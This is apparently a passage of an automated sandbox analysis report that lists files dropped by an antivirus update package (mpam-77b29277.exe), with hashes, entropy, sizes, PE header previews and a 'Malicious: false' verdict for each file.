SHA-256:	45FDAD8C8F84182DA054E152C5F2CB132DB835BD9DD8816C19EFDFB070AEEB6F
SHA-512:	F677FBB62778F2EEB47B8E320B4028F7D7F68E15E3C986E66F20DAC88C42D213122602D3D115B48B9FD0F09D3B0EEBF4D18ED3631546AF94C40F40FB7BF60684
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........J...............................................p...... .....@.......................................... ...F...........L... ...........................................................................................rdata..p...........................@..@.rsrc....F... ...H..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...A...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\tt-RU\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28392
Entropy (8bit):	5.491567325608048
Encrypted:	false
SSDEEP:	384:7rGYWIS65NYeZZWS8/WPRDBRJJ9oX7aJdlGslGX/:7rxWxnOR1PJU7aJGx
MD5:	2A6AFABE73744D9F425AD9D689A536E4
SHA1:	0A5F0FEAD051761495E96F812F3E9231A979BC66
SHA-256:	8317A8E6F50BD32F95317BE8EEA81E17E2A7663CB62186995CBBA994DDDCE0DF
SHA-512:	2FDAE379A5E46BEA969AD033E909E2267D19EF512580DAEA1A05508722F26091E28E9DEF85395442BE604A64437C6D724A7570237C12201D9267DB9E35BE0EDE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........L...............................................p............@.......................................... ..`I...........N... ...........................................................................................rdata..p...........................@..@.rsrc...`I... ...J..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...D...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ug-CN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28392
Entropy (8bit):	5.494964029220973
Encrypted:	false
SSDEEP:	384:7r6PllWv31mC/yHk1bLEwGPdPsZ/syTnKs6cmM7TqA8YewdWS8/WBRDBRJ/gnlGN:7rzxmJjUR1PtN
MD5:	F9007E5EF37ED62D4574EA8F1AA41875
SHA1:	207D337F2E08B21DA006C85E3787B9D4F0F75670
SHA-256:	7B74D3CA3A9951C039993B34BC4A04BF810A6FCA726485599E336ABEB5E2F3EB
SHA-512:	45C80A9E8754116EAB0725483842C9334286838400DA6389F23AE3A94274B0028D8877F4DE706698E0FE80AA402245AC8B32531E585ACB94FFFBBDE1CC2B979D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........L...............................................p............@.......................................... ..lI...........N... ...........................................................................................rdata..p...........................@..@.rsrc...lI... ...J..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...D...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\uk-UA\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	65768
Entropy (8bit):	4.726831332917431
Encrypted:	false
SSDEEP:	384:7r/G8WcksvPAb/StbLGTyEfQDHM8XSQv2YW2FyUhnEoiIlddx1KtVQV4minZBWcP:7rc+L6bpjFR1PiXi
MD5:	088D2A1E50EF7AF09C5D828C322DA741
SHA1:	883C6BDBBFB1244C7F44B92C2FE1703B8E65B279
SHA-256:	535E01F1C8A430CDCA3A804A92D80B6319017737D4B8CB431F5C23B1EF4AFE5C
SHA-512:	F933D9C69BE00B35B33C624421AEADF8F416604B3D4F51B4CED06B4232666BD8525F5731FB863EFCE53FEA74C2E65AD2669A2780AB21E53EA892723A255203B3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\uk-UA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28408
Entropy (8bit):	5.513169244459074
Encrypted:	false
SSDEEP:	384:7rcJD3W7jAGcs+avYavqmowgcWS8/WLRDBRJGbAl5V:7rUD3WRowcqR1Pm2
MD5:	F345D7719ED1F32D9443AB71D36BAC3E
SHA1:	436EBA43820E9B2FCB5025B489E9B6563CDA34CE
SHA-256:	13AC1F29F2108EC7DB952EDBC6F51DA4D2F0CBDA46B514EFF70B2E96E06B37B9
SHA-512:	92DE76514D21AF9B9655FF5A7925F26EAD15DC742B576B89DFC063406D18DD91173E59A0044D7D33BF147A38AA2C40942E03E777578BE746F433E5BEC335C154
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........L...............................................p.......(....@.......................................... ..tH...........N... ...........................................................................................rdata..p...........................@..@.rsrc...tH... ...J..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...C...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ur-PK\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28392
Entropy (8bit):	5.4174869099500045
Encrypted:	false
SSDEEP:	384:7rX97kOXgLhi2g3Bwh0jcxh70OTJfqUxmtKz3WS8/WJRDBRJ4pqslGslQzNw:7rtI6tKUoR1PTnC
MD5:	023469B9CE9A65693DDE3DAAA3B7F41C
SHA1:	57D004A57AB57FFA6E5AEA4258CB3EDCC8BA2544
SHA-256:	BAF468BF80396223C1A0B93DC499A8B713C12E8656BA42D3D2176DC29E729237
SHA-512:	7F09841203B2399CA41AA8011D25DA58A1612BC544B3DCFF66F94ADBC7FF17DE180C186CD1F2E2089C1239A86CB26621C6735EFF97C751314736DD9B7FC59D2E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........L...............................................p......>.....@.......................................... ...I...........N... ...........................................................................................rdata..p...........................@..@.rsrc....I... ...J..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..8E...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\vi-VN\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64248
Entropy (8bit):	4.6791964208434305
Encrypted:	false
SSDEEP:	384:7rZxFfa93cGjIWtU+zLJIM+M7k1EvMisEEuk4VQce2ERW9QW0RDBRJechl95r51:7rZfy3jxDxIM3kWf6R1Peczr51
MD5:	8292B42976EA7E5B4A5143006550C0DB
SHA1:	9863047D87E413F7395E3A796BC7FBFE4270FDF8
SHA-256:	652CA8F94969FE4BAADEAE439D48274B2E0C828169B523D5CE9D9C5E1CDD6951
SHA-512:	F3FDF7A319F4FAE8206EDEE1FCAE1B67E6B0B1D99D0DA3CB3EC24894529C5FB27C5C4B227B2A63E4588FBB0A30019E5F8AF9063357E2A7AC801B1DA7F04C6602
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................/2....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\vi-VN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26872
Entropy (8bit):	5.409437045283912
Encrypted:	false
SSDEEP:	192:7rRWhUfIpk0odFdsM6iCp4ffDnbhnpv6IDlzSYXkvJixNFyRN3MwOWS8/WK/xjBe:7rRII/XkvoOOWS8/WKtRDBRJw8IrltPP
MD5:	F587B7F551D3304A63BE6764965B701C
SHA1:	AD58320DF032E45BABA90BE89BA821C7A9C3ED39
SHA-256:	B45C39AE05934549E09841C0391F844C1B63FBB9134B2EBC8CC9F4B426178D11
SHA-512:	2223CD2A6C116B28D0EC05A7BF29B9F31DC1EEB74E235D2001B8CF7D6397F428E9314B3B46B020E258CB0B59FC65D91BD6E7CBC8AEA21528B96E85EF81926B0B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........F...............................................p......4G....@.......................................... ...C...........H... ...........................................................................................rdata..p...........................@..@.rsrc....C... ...D..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..(?...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpAsDesc.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	200928
Entropy (8bit):	5.351709179488571
Encrypted:	false
SSDEEP:	6144:7miTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJN:ht
MD5:	FFF62C12CDFBB5F8245F0C5E09CE6276
SHA1:	78519CEE74DB2364EF53BAF59BD67B4563AD987E
SHA-256:	55E058C5969102272EA423BFE8467325FBE0DA2627258DB99243307280778B54
SHA-512:	B276A247DD47265E49482361E85250D16987A5C7F3FBBCA7611C2821F3DC68F31F8589510172A01DBE4AC0EB29A80165B69A6EDF58B61CC3C8CC96EAFE9BE0C3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L.....+;...........!................................................................P.....@.......................................... ................... ..............8............................................................................text...............................@..@.rsrc........ ......................@..@..............+;........T...8...8.........+;........$...................8....rdata..8...x....rdata$zzzdbg.... ..P....rsrc$01....P#..8....rsrc$02.... ....D}oe.......k............%...+;........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpClient.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	899320
Entropy (8bit):	6.682610156226712
Encrypted:	false
SSDEEP:	24576:MnP38IhTDTYYuNu10m6GaHrMIQhgsXcNKCTXSHTjPTLRRO:MnP38Ih/YYuNu10vGaHrMIQhgsXcNKCX
MD5:	6080672558962E1E2AAD8CFDF838A294
SHA1:	24439D7EBA14149987F0B854A2DA824243EC5BA2
SHA-256:	3986D2EB04BC82362722BB70C71BCBABBD0FCF567B278BA6DC3770ADDDCC45C5
SHA-512:	35B195F99C78C4C92D72B25EA705311445E94250624A4003EA775B4D0EB07AA435758D3B1F85D7B26CACF3183E31D3940DAC55B0CB93B1F4BE181873FCE90211
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-g..i.k.i.k.i.k..sh.h.k.tj.g.k.th.z.k.`~..~.k.i.j..k.tn.@.k.t..k.k..sk.h.k..sb.i.k.N...h.k.to.\|.k..s..h.k..si.h.k.Richi.k.................PE..L...F.............!.....6...j......@b.......P.....[................................=.....@A.........................*......<...T........................ ... .........T...................D9..........@...............8....(.......................text...U5.......6.................. ..`.data...py...P...n...:..............@....idata...$.......&..................@..@.didat..T...........................@....rsrc...............................@..@.reloc...... ......................@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpCmdRun.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	729744
Entropy (8bit):	6.355804663410413
Encrypted:	false
SSDEEP:	12288:m4h0Z2jiok0mRI97vITOWsLgRPpm+ASEJuu8D8lg7um:mY0ZOiv0mg7vITOWsLgRPprASwtm
MD5:	ECA84EEA3FC50DBC31A17D271B7062AF
SHA1:	D2A97984C0EE9E87B1F338B10A3BEFBA2F58B1B9
SHA-256:	B0337D5C7D36278EC6707749F35341EB6EAAD8B1713125C043E298021BA07401
SHA-512:	3F01154E1C88912634DDC7A894FC8F9094745456547927C32618874AE3C41258A280C1E5B1F7CB67065EC7D84497A4E814F24BDBF6F10DC93897723D7D9046ED
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.P...P...P......Q......R.......@...Y...F.......c.......C...P..............w.p.R.......E.....Q......Q...RichP...................PE..L.....Q=.................8...................P....@..........................0......L............ ..........................@............................:......4...\v..T...................t%..........@...............<....D.......................text....8.......8.................. ..`.data...P=...P...4...<..............@....idata..6,...........p..............@..@.didat..............................@....rsrc...............................@..@.reloc..4............f..............@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpCopyAccelerator.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	129032
Entropy (8bit):	5.748576718072055
Encrypted:	false
SSDEEP:	1536:1WzaTuV7bt/Zx9To4TpO/y7EuTPzdZSh4O5pluXBnQQ5PZK:1WzaTuVTOy7Eu/dZSh4QuxQQ5k
MD5:	EC58F9927892AF743D657B8F6F2B0B31
SHA1:	2156203616016193F14290A91A1348079058170D
SHA-256:	2D69220FF1106247A7B541619923F1BAAF32C56D0D04E7691E21BEAECEB9568A
SHA-512:	A248D6744FCB055EBE42F61B48C837EC74FF931DEF7DBC346C330F32CF2D03DB170C50E327D68CDBEC878F1B1778643F0B022AB6BFE3310A93E258A4536F2FD0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K..K..K.....I.....J.....G..B.^.[.....d.....B..K........u.....Z....2.J.....J..RichK..........................PE..L.....?...........................................@..................................z........... ..........................l".......@...................&.........../..T............................................ ..h............................text............................... ..`.data...............................@....idata....... ......................@..@.rsrc........@......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpDetours.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	109280
Entropy (8bit):	6.654642882126128
Encrypted:	false
SSDEEP:	1536:REEaad1QUPi2Ts89mqINTKBJUr6pmKKUnjzeAqJAiSlTi4Kj+OHPosd:uuQUPi789RnjTBjzWuiSl4frd
MD5:	B8D9BDFE2B9E5CC434D08C2D58EE362A
SHA1:	F98A3E5AC678D22DF97FCA8477087D67E8EE0E11
SHA-256:	5EABB3CA44F9247703978939C1C1759CBF9D69BD0D53F4B9D3BEFDF476415DB8
SHA-512:	68F9BA5592DB1C62379DC7156BFCA3D1C8EFE74133B6C2B77D96BE20C28F8152CE0C1AF799100D0AC26AE1720D7FA12D4A4B0CCCCC91B616345AACF6BF814CE8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X......g.....;......;......#........;.....g.....g.......;....g.O...g.....Rich..................PE..L....S:............!.....L...B...............`............................................@A.........................X......Pr........................... ......x....6..T....................!..........@............p..L............................text....K.......L.................. ..`.data........`.......P..............@....idata.......p.......X..............@..@.rsrc................j..............@..@.reloc..x............n..............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpDetoursCopyAccelerator.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	61688
Entropy (8bit):	6.610818978763949
Encrypted:	false
SSDEEP:	768:M6GwqNEyklnnIJBDhK01ccg2QkxteGqlZ1YAE03PTPjW3eiH/7DN1fjbW4v9R1PQ:bGgJnIdR1PQmspZecE7/jbWm9HP/4
MD5:	E14F76935B760B68B34AAB00CC6A7116
SHA1:	8D545FE016A7186162259921F535969F27E2830E
SHA-256:	20B97E552984F597711D8A8C766A809F51657F1F59A9BA3CEE13E7CD97717FAF
SHA-512:	1E5DE6201BCE1187F8B6597A31CDCB843D3A765A13D305EEF44507116BD33E18CAF95B9141DB18A0B5F00BFDCC35002336F12AF5128EFBF8303F3F7FF6E29D24
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K...f...f...f......f.......f.......f.......f...f...g......)f......f.....1f.......f...}..f......f..Rich.f..........PE..L.................!.................u...............................................Y....@A........................@...E...............X................ ...........-..T...................X!..........@............................................text............................... ..`.data...............................@....idata..:...........................@..@.rsrc...X...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpOAV.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	432888
Entropy (8bit):	6.2141863473252705
Encrypted:	false
SSDEEP:	6144:myNx5/z2qfstYNVzhF0budKwymiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVo:FP/z2qf08hF+udKHcg
MD5:	F963795F0C4B10F6A06D44A89025A235
SHA1:	47E4F144D8F99AE0DDAA3AE1AC8EE58E768B2B7D
SHA-256:	C0C9B303A85E085CAF876CD46EB30152F4D5557F404B2F896728802C4A427E4C
SHA-512:	A447AD235CC76B6A177187DC0068651AE7692C93A2C2B89CE9DD6591DDB0FE479EC4365BED18FE369DE1118D0E07D45D6ADAE6FD61901A23589A75AFD79B18F8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:d..~...~...~....p.......w..o...~...Y....w..c....w.......p.......p.5....w..Y....p.......p......Rich~...........................PE..L...ARq............!.....>...F.......T.......P....._.................................O....@A........................`K..........x....................z... ......4(..T...T....................%..........@............................................text....<.......>.................. ..`.data...X#...P.......B..............@....idata...............X..............@..@.rsrc................d..............@..@.reloc..4(.......*...P..............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MsMpLics.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12536
Entropy (8bit):	6.491758099026807
Encrypted:	false
SSDEEP:	192:7rdwWgFHWaALc2Fu462TNAxjB1RDBQABJI7vuUgxfzfqnajRXi3:7rdwWgFHWa1MJaRDBRJKIrltK
MD5:	30AC9560D381D704B9F7ADDAF0F82A94
SHA1:	24BD8E2F0FF56E2973AC9AD44493AA6994A64263
SHA-256:	E1FA909C9A6BFE68C219734F54A1605A0920E6E0914D780DF59F7855BE6A0F5C
SHA-512:	0169E877BEC92C06EBD273E90A687D356118CAF84CBFF8421A8535E23294BAB8E00AC452A0EF3F87B0847054A9B5DAFC224440D8A943F93A7E02524F1B6A017A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...Q).............!.........................................................0.......}....@.......................................... ................... ..............8............................................................................text...............................@..@.rsrc........ ......................@..@............Q)..........T...8...8.......Q)..........$...................8....rdata..8...x....rdata$zzzdbg.... ..0....rsrc$01....0!..`....rsrc$02.... ......d.us.=WY.:8z.h+...-B..*1RQ)..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\en-US\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59128
Entropy (8bit):	4.29248386026072
Encrypted:	false
SSDEEP:	768:7rziJbyt33aEhrdTTm147vXahEzhEthEGQRQwhE3DbR1PA:riJbytHa6rdd7vM+4ImbHPA
MD5:	499D4C07DDF2D258B8CB7B37A1D892CC
SHA1:	03402AFEC69C33900B1010A9B4E08F47B99FF324
SHA-256:	3994A0D7AFCE70F018B673C5689E192CE28545C55AFAFEE1C37743AA0F934CF8
SHA-512:	4BABAD1C0CCBF31BDE26BA8FE7CFFB69087E8E7050C2B502F630AD79BDE3CB020D9F647052FE1DDBBD923725B8DBF4F3A263E3AEE4070D617F7ED4BE1971BF1A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\endpointdlp.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	507616
Entropy (8bit):	6.556678573603523
Encrypted:	false
SSDEEP:	12288:TJY71JKZk4w9pEEJbC/dGVuYp+kPeAbBsiRV+:q71JKZ3w/JbC/d9VcV+
MD5:	8413BF8A8B935E57D301CBCDA64E1934
SHA1:	73B9785F61B70E657DA6805FDFEB979E5F0C2DCE
SHA-256:	EA371C42AED818BF88AB029F439167F803ADB1C9595B7DDB8DFF16EBBA591828
SHA-512:	2828A73B1A071CEED5EB2868EFCA2FBA1B20B3477A601AEE4095F077C70549FBA6E0E8993DAFCAE7DF58357EEE86805AB55899AFE400653C25A0F3FF1CACAD7D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..4x.~gx.~gx.~g...fk.~gx..g.~g..}fY.~g..{f..~g...gz.~g..~fy.~g..vf).~g..zf^.~g..gy.~g..\|fy.~gRichx.~g........PE..L....S.............!....."...................@............................................@A........................0)......dr..........(................ ......`E...\|..T....................0..........@............p..`............................text...!!.......".................. ..`.data....)...@.......&..............@....idata.......p.......@..............@..@.rsrc...(............R..............@..@.reloc..`E.......F...X..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\zh-CN\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29944
Entropy (8bit):	6.630772850063712
Encrypted:	false
SSDEEP:	768:7r0EX/1LZrJe18HL3eIb4TKWUv/UZT/4pAiDR1PB:8E/1V/lb4OWhT/4pAiDHPB
MD5:	6B9084CA751B5AE068F5162096D2A1CF
SHA1:	B236CC3381C2E953079A0C5A0A1A1103D0B95AE7
SHA-256:	A6D1822E0600E72B0BF263A93084EA5641472E0EE4ED0CBFC2F51C5371927905
SHA-512:	B684F33EE24A017BE274006BCB1892C9C3427C3897B5BD54DE73C6B792CD9F807A3EA7DE31470C1BA103833C57339FD799EDBD417D67AF9A507B3F2F02204ED0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.........R...............................................p......u.....@.......................................... ...O...........T... ..............8............................................................................rdata..............................@..@.rsrc....P... ...P..................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\zh-CN\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32504
Entropy (8bit):	5.946223081024714
Encrypted:	false
SSDEEP:	384:7rOGBGjW0xjBcIkwYwJ/KEvWVBW6RDBRJThl95rk:7r0jkwYwJ/KEedR1PTzrk
MD5:	5FD7A02D2B6C5EE2ED14E07A4A6F36BD
SHA1:	5013F1291EB239739EC3FAFCC2EB4D7A74092830
SHA-256:	7EB646897BD9FF85CD859A48BFF19D994AA44137AD6B06E90AD2C7F0F2A65C9D
SHA-512:	61551D24FF84905B604C8150074A06C8C61569451BD854B9C8CA4F8927DDE30825CD1EA57A561394E4E2A8801BC9E8C1A56B9A5061A545EF6F9F1E8EC6CD9D6B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.........\.......................................................\|....@.......................................... ...X...........^... ..............8............................................................................rdata..............................@..@.rsrc....`... ...Z..................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\zh-CN\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	48376
Entropy (8bit):	4.946495918987182
Encrypted:	false
SSDEEP:	768:7rmvXitqhamD9WAzUd+EXuopbp8K5qHXBQJwKR1Pp:OqtUa3lX98KkXJKHPp
MD5:	E648AA637FDBB85D8E5513FC36367941
SHA1:	786F17D9C608CFAA30164BB8AFB6CDEFDDF433E6
SHA-256:	0E827FA44D0228A1819611BB935FEE4B49B77F225D1A0AB1106052271489B7BF
SHA-512:	D3AA3A4E2BFCFBD76BF1B712AAE41778E3C91E90B849CB5C01B56400CA508791DE93F37EFCD22B10FC879A044D0BD53F983A81755D60E85CAE969B0A0D3F3E23
Malicious:	false
